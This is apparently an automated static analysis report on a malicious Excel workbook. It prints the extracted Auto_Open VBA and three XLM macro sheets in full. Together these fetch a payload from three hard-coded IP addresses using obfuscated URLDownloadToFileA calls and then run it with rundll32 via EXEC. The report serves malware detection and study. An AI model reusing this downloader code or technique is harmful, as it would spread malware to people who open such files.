Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 caf107ae36eaee78…

MALICIOUS

Office (OOXML)

110.4 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-05-15
MD5: d1957c97341606a1fc76161bd37e6449 SHA-1: 572c1562fc9298556a7d8c350294b56256dcd3d3 SHA-256: caf107ae36eaee789eb91db916ee548fac8263bbd822cde1ae300adf87b971a9
158 Risk Score

Heuristics 6

  • Excel 4.0 macro sheet (3 sheet(s)) critical 1 related finding OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Dangerous XLM formula APIs: HALT, GOTO, REGISTER, EXEC critical OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • VBA project inside OOXML medium 1 related finding OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Function Auto_Open()
  • Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET
    Excel workbook contains 3 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://185.45.193.74/44313,6048108796.dat Referenced by macro
    • http://195.123.220.175/44313,6048108796.datReferenced by macro
    • http://45.144.29.253/44313,6048108796.datReferenced by macro
    • http://185.45.193.74/Referenced by macro
    • http://195.123.220.175/Referenced by macro
    • http://45.144.29.253/Referenced by macro
    • http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 796 bytes
SHA-256: 75218b3f0bb17eeec5572784caf45beb820d0c1786c79b4827590e90358f3168
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Function Auto_Open()


Application.Run Sheets("JUtgsgg").Range("AJ6")

Application.Run Sheets("JUtgsgg").Range("A5")






End Function
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 13824 bytes
SHA-256: f94c515c15a2369b46850e056a403c6ee0151dcf0eaaee0fd438d3a90bd5464f
xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 4291 bytes
SHA-256: 3b11ac276e03e0a75147eb42f7fa8acafe7bfdb28b0154bb5f4e04a17633ef7a
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{DF8B6045-B836-40DC-A5AC-AC252F7F483B}"><dimension ref="AE92:AK113"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="13.5703125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="29" width="13.5703125" style="1"/><col min="30" max="30" width="13.5703125" style="1" customWidth="1"/><col min="31" max="33" width="13.5703125" style="1" hidden="1" customWidth="1"/><col min="34" max="34" width="19.5703125" style="1" hidden="1" customWidth="1"/><col min="35" max="35" width="13.5703125" style="1" hidden="1" customWidth="1"/><col min="36" max="36" width="21.5703125" style="1" hidden="1" customWidth="1"/><col min="37" max="37" width="13.5703125" style="1" hidden="1" customWidth="1"/><col min="38" max="38" width="13.5703125" style="1"/><col min="39" max="39" width="21.42578125" style="1" bestFit="1" customWidth="1"/><col min="40" max="16384" width="13.5703125" style="1"/></cols><sheetData><row r="92" spans="33:36" x14ac:dyDescent="0.25"><c r="AI92" s="1"><v>1</v></c></row><row r="93" spans="33:36" x14ac:dyDescent="0.25"><c r="AI93" s="1"><v>9</v></c></row><row r="94" spans="33:36" x14ac:dyDescent="0.25"><c r="AJ94" s="1" t="b"><f>ON.TIME(NOW()+"00:00:02","Grestes")</f><v>0</v></c></row><row r="95" spans="33:36" x14ac:dyDescent="0.25"><c r="AG95" s="1" t="str"><f>CONCATENATE(AG101,AH95,AG99,AG100)</f><v>http://185.45.193.74/44313,6048108796.dat</v></c><c r="AH95" s="1"><f>NOW()</f><v>44313.604810879631</v></c></row><row r="96" spans="33:36" x14ac:dyDescent="0.25"><c r="AG96" s="1" t="str"><f>CONCATENATE(AG102,AH95,AG99,AG100)</f><v>http://195.123.220.175/44313,6048108796.dat</v></c></row><row r="97" spans="33:36" x14ac:dyDescent="0.25"><c r="AG97" s="1" t="str"><f>CONCATENATE(AG103,AH95,AG99,AG100)</f><v>http://45.144.29.253/44313,6048108796.dat</v></c><c r="AJ97" s="1" t="b"><f>HALT()</f><v>0</v></c></row><row r="98" spans="33:36" x14ac:dyDescent="0.25"><c r="AH98" s="1" t="str"><f>CONCATENATE(AG106,AG107,AG113)</f><v>URLDownloadToFileA</v></c></row><row r="99" spans="33:36" x14ac:dyDescent="0.25"><c r="AG99" s="1" t="s"><v>0</v></c><c r="AI99" s="1" t="s"><v>1</v></c></row><row r="100" spans="33:36" x14ac:dyDescent="0.25"><c r="AG100" s="1" t="s"><v>2</v></c></row><row r="101" spans="33:36" x14ac:dyDescent="0.25"><c r="AG101" s="1" t="str"><f>"http://185.45.193.74/"</f><v>http://185.45.193.74/</v></c><c r="AI101" s="1" t="s"><v>3</v></c></row><row r="102" spans="33:36" x14ac:dyDescent="0.25"><c r="AG102" s="1" t="str"><f>"http://195.123.220.175/"</f><v>http://195.123.220.175/</v></c><c r="AI102" s="1" t="s"><v>4</v></c></row><row r="103" spans="33:36" x14ac:dyDescent="0.25"><c r="AG103" s="1" t="str"><f>"http://45.144.29.253/"</f><v>http://45.144.29.253/</v></c></row><row r="104" spans="33:36" x14ac:dyDescent="0.25"><c r="AH104" s="1" t="e"><f>GOTO(Blodas!G6)</f><v>#N/A</v></c></row><row r="105" spans="33:36" x14ac:dyDescent="0.25"><c r="AI105" s="1" t="s"><v>5</v></c></row><row r="106" spans="33:36" x14ac:dyDescent="0.25"><c r="AG106" s="1" t="str"><f>"URLDow"</f><v>URLDow</v></c></row><row r="107" spans="33:36" x14ac:dyDescent="0.25"><c r="AG107" s="1" t="str"><f>"nloadToF"</f><v>nloadToF</v></c></row><row r="113" spans="33:33" x14ac:dyDescent="0.25"><c r="AG113" s="1" t="str"><f>"ileA"</f><v>ileA</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_01.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet2.xml 2111 bytes
SHA-256: a5fc80b1569128bd0323daacf4b0484b147d9d37755aacc26435ea011bd9f0cd
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{505B4405-D1BA-4A49-969C-12F950A2EDD3}"><dimension ref="G11:G18"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultColWidth="7.85546875" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="7.85546875" style="1"/></cols><sheetData><row r="11" spans="7:7" x14ac:dyDescent="0.25"><c r="G11" s="1" t="b"><f>REGISTER(JUtgsgg!AI99,JUtgsgg!AH98,JUtgsgg!AI101,JUtgsgg!AI102,,JUtgsgg!AI92,9)</f><v>0</v></c></row><row r="12" spans="7:7" x14ac:dyDescent="0.25"><c r="G12" s="1" t="e"><f>Belandes(0,JUtgsgg!AG95,JUtgsgg!AI105,0,0)</f><v>#NAME?</v></c></row><row r="13" spans="7:7" x14ac:dyDescent="0.25"><c r="G13" s="1" t="e"><f>IF(G12&lt;0, Belandes(0,JUtgsgg!AG96,JUtgsgg!AI105,0,0))</f><v>#NAME?</v></c></row><row r="14" spans="7:7" x14ac:dyDescent="0.25"><c r="G14" s="1" t="e"><f>IF(G13&lt;0, Belandes(0,JUtgsgg!AG97,JUtgsgg!AI105,0,0))</f><v>#NAME?</v></c></row><row r="16" spans="7:7" x14ac:dyDescent="0.25"><c r="G16" s="1"><f>IF(G14&lt;0,CLOSE(0),)</f><v>0</v></c></row><row r="18" spans="7:7" x14ac:dyDescent="0.25"><c r="G18" s="1" t="e"><f>GOTO(Jioka!H4)</f><v>#N/A</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>
xlm_sheet_02.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet3.xml 1944 bytes
SHA-256: a6c079d2a564b952bdc7f60d49402489a374e91f07f8b51ef328523d2a650900
Preview script
First 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{E09DE6CC-F7FE-45A7-AA3D-E8E197BA8A24}"><dimension ref="H7:I20"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="7" width="9.140625" style="1"/><col min="8" max="8" width="9.85546875" style="1" customWidth="1"/><col min="9" max="16384" width="9.140625" style="1"/></cols><sheetData><row r="7" spans="8:9" x14ac:dyDescent="0.25"><c r="I7" s="1" t="str"><f>"rund"</f><v>rund</v></c></row><row r="9" spans="8:9" x14ac:dyDescent="0.25"><c r="I9" s="1" t="str"><f>"ll32 ..\TYFYTY.GVTYGU,DllReg"</f><v>ll32 ..\TYFYTY.GVTYGU,DllReg</v></c></row><row r="10" spans="8:9" x14ac:dyDescent="0.25"><c r="I10" s="1" t="str"><f>"isterServer"</f><v>isterServer</v></c></row><row r="16" spans="8:9" x14ac:dyDescent="0.25"><c r="H16" s="1" t="b"><f>EXEC(I7&amp;I9&amp;I10)=PI()</f><v>0</v></c></row><row r="20" spans="8:8" x14ac:dyDescent="0.25"><c r="H20" s="1" t="b"><f>HALT()</f><v>0</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.